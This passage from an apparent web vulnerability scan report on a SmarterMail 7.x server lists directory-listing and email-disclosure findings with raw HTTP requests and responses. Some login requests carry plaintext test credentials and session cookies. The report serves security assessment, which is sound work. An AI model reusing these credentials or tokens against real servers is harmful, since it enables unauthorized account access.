Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1989
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/misc/tree/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/images/misc/">[To Parent Directory]</A>
...[SNIP]...

12.57. http://vulnerable.SmarterMail 7.x.host:9998/MailProcessing/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /MailProcessing/

Request

GET /MailProcessing/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:05 GMT
Content-Length: 4734
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /MailProcessing/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-f
...[SNIP]...
<PRE>
<A href="/">[To Parent Directory]</A>
...[SNIP]...

12.58. http://vulnerable.SmarterMail 7.x.host:9998/Main/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/

Request

GET /Main/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 9191
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Main/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Ver
...[SNIP]...
<PRE>
<A href="/">[To Parent Directory]</A>
...[SNIP]...

12.59. http://vulnerable.SmarterMail 7.x.host:9998/Main/Alerts/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Alerts/

Request

GET /Main/Alerts/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1866
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Main/Alerts/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-fami
...[SNIP]...
<PRE>
<A href="/Main/">[To Parent Directory]</A>
...[SNIP]...

12.60. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Calendar/

Request

GET /Main/Calendar/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1658
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Main/Calendar/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-fa
...[SNIP]...
<PRE>
<A href="/Main/">[To Parent Directory]</A>
...[SNIP]...

12.61. http://vulnerable.SmarterMail 7.x.host:9998/Main/Sharing/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Sharing/

Request

GET /Main/Sharing/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:09 GMT
Content-Length: 1565
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Main/Sharing/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-fam
...[SNIP]...
<PRE>
<A href="/Main/">[To Parent Directory]</A>
...[SNIP]...

12.62. http://vulnerable.SmarterMail 7.x.host:9998/Reports/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/

Request

GET /Reports/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:04 GMT
Content-Length: 2112
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Reports/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"
...[SNIP]...
<PRE>
<A href="/">[To Parent Directory]</A>
...[SNIP]...

12.63. http://vulnerable.SmarterMail 7.x.host:9998/Reports/Controls/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/Controls/

Request

GET /Reports/Controls/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:04 GMT
Content-Length: 1471
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Reports/Controls/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font
...[SNIP]...
<PRE>
<A href="/Reports/">[To Parent Directory]</A>
...[SNIP]...

12.64. http://vulnerable.SmarterMail 7.x.host:9998/Services/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Services/

Request

GET /Services/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:04 GMT
Content-Length: 2862
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Services/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:
...[SNIP]...
<PRE>
<A href="/">[To Parent Directory]</A>
...[SNIP]...

12.65. http://vulnerable.SmarterMail 7.x.host:9998/SystemAdmin/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /SystemAdmin/

Request

GET /SystemAdmin/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:04 GMT
Content-Length: 9879
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /SystemAdmin/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-fami
...[SNIP]...
<PRE>
<A href="/">[To Parent Directory]</A>
...[SNIP]...

12.66. http://vulnerable.SmarterMail 7.x.host:9998/SystemAdmin/GettingStarted/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /SystemAdmin/GettingStarted/

Request

GET /SystemAdmin/GettingStarted/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:04 GMT
Content-Length: 1513
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /SystemAdmin/GettingStarted/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/SystemAdmin/">[To Parent Directory]</A>
...[SNIP]...

12.67. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/

Request

GET /UserControls/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:04 GMT
Content-Length: 3219
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /UserControls/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-fam
...[SNIP]...
<PRE>
<A href="/">[To Parent Directory]</A>
...[SNIP]...

12.68. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Calendar/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Calendar/

Request

GET /UserControls/Calendar/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:12 GMT
Content-Length: 1692
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /UserControls/Calendar/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p
...[SNIP]...
<PRE>
<A href="/UserControls/">[To Parent Directory]</A>
...[SNIP]...

12.69. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/PanelBarTemplates/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/PanelBarTemplates/

Request

GET /UserControls/PanelBarTemplates/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:13 GMT
Content-Length: 2739
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /UserControls/PanelBarTemplates/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/UserControls/">[To Parent Directory]</A>
...[SNIP]...

12.70. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Popups/

Request

GET /UserControls/Popups/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:04 GMT
Content-Length: 2907
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /UserControls/Popups/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {f
...[SNIP]...
<PRE>
<A href="/UserControls/">[To Parent Directory]</A>
...[SNIP]...

12.71. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/ThirdPartyComponents/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/ThirdPartyComponents/

Request

GET /UserControls/ThirdPartyComponents/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:13 GMT
Content-Length: 1651
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /UserControls/ThirdPartyComponents/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/UserControls/">[To Parent Directory]</A>
...[SNIP]...

12.72. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/TodayPageTemplates/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/TodayPageTemplates/

Request

GET /UserControls/TodayPageTemplates/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:13 GMT
Content-Length: 1694
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /UserControls/TodayPageTemplates/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/UserControls/">[To Parent Directory]</A>
...[SNIP]...

13. Email addresses disclosed
There are 14 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


13.1. http://vulnerable.SmarterMail 7.x.host:9998/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Proxy-Connection: Keep-Alive
Host: vulnerable.SmarterMail 7.x.host:9998
Cookie: SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserEmail"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:23:26 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=wmcwqwar3z1uqmbg32jkdrmv; path=/; HttpOnly
Set-Cookie: SM5Skin=Default; expires=Thu, 01-Oct-2020 22:23:26 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 30030


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<span class="HeaderUserName">enduser@hoytllc.com</span>
...[SNIP]...

13.2. http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Default.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmWelcome.aspx?unframed=true
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SelectedLanguage=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; SM5Skin=Default

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:34:49 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 30106


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<span class="HeaderUserName">euser@hoytllc.com</span>
...[SNIP]...

13.3. http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Default.aspx HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmWelcome.aspx?unframed=true
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:19:15 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 30114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<span class="HeaderUserName">enduser@hoytllc.com</span>
...[SNIP]...

13.4. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Login.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

POST /Login.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; settings=; SelectedLanguage=; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserEmail"}
Content-Length: 1287

ctl00%24ScriptManager1=ctl00%24UpdatePanel1%7Cctl00%24BPH%24LoginImageButton&ctl00%24MPH%24txtUserName=enduser%40hoytllc.com&ctl00%24MPH%24txtPassword=end123&ctl00%24MPH%24chkAutoLogin=on&ctl00%24BPH%
...[SNIP]...

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:27:23 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Set-Cookie: SelectedLanguage=; expires=Thu, 01-Oct-2020 22:27:23 GMT; path=/
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 5510

3592|updatePanel|ctl00_UpdatePanel1|
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitle
...[SNIP]...
<div class="LoginLabel">
           Email Address
           (ex. user@example.com)
       </div>
       <input name="ctl00$MPH$txtUserName" type="text" value="enduser@hoytllc.com" id="ctl00_MPH_txtUserName" tabindex="1" style="width: 310px" />
...[SNIP]...

13.5. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Login.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

POST /Login.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; settings=; SelectedLanguage=; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserEmail"}
Content-Length: 1287

ctl00%24ScriptManager1=ctl00%24UpdatePanel1%7Cctl00%24BPH%24LoginImageButton&ctl00%24MPH%24txtUserName=auser%40hoytllc.com&ctl00%24MPH%24txtPassword=auser123&ctl00%24MPH%24chkAutoLogin=on&ctl00%24BPH%
...[SNIP]...

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:28:43 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Set-Cookie: SelectedLanguage=; expires=Thu, 01-Oct-2020 22:28:43 GMT; path=/
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 5508

3590|updatePanel|ctl00_UpdatePanel1|
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitle
...[SNIP]...
<div class="LoginLabel">
           Email Address
           (ex. user@example.com)
       </div>
